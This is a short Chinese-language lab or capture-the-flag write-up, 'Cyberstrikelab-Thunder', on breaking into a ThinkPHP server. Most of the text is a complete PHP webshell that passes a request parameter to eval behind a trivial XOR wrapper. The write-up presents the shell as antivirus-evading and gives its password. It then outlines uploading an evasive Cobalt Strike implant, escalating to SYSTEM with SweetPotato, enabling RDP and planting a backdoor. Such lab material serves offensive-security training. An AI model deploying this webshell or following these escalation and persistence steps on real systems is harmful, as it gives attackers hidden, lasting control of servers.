Cyberstrikelab-Thunder
ThinkPHP 进入80端口,用工具直接getshell 生成的后门很快会被查杀,因此可以写入一个免杀木马 <?php function xorEncryptDecrypt($data, $key) { $keyLength = strlen($key); $result = ''; for ($i = 0; $i < strlen($data); $i++) { $keyChar = $key[$i % $keyLength]; $result .= chr(ord($data[$i]) ^ ord($keyChar)); } return $result; } $originalData = $_REQUEST["a"]; $key = $_REQUEST["b"]; $encryptedData = xorEncryptDecrypt($originalData, $key); $decryptedData = xorEncryptDecrypt($encryptedData, $key); echo @eval($decryptedData); ?> //密码是a 根目录拿到flag1 上传免杀CS木马,然后sweetpotato提权到system 开启RDP,添加后门 ...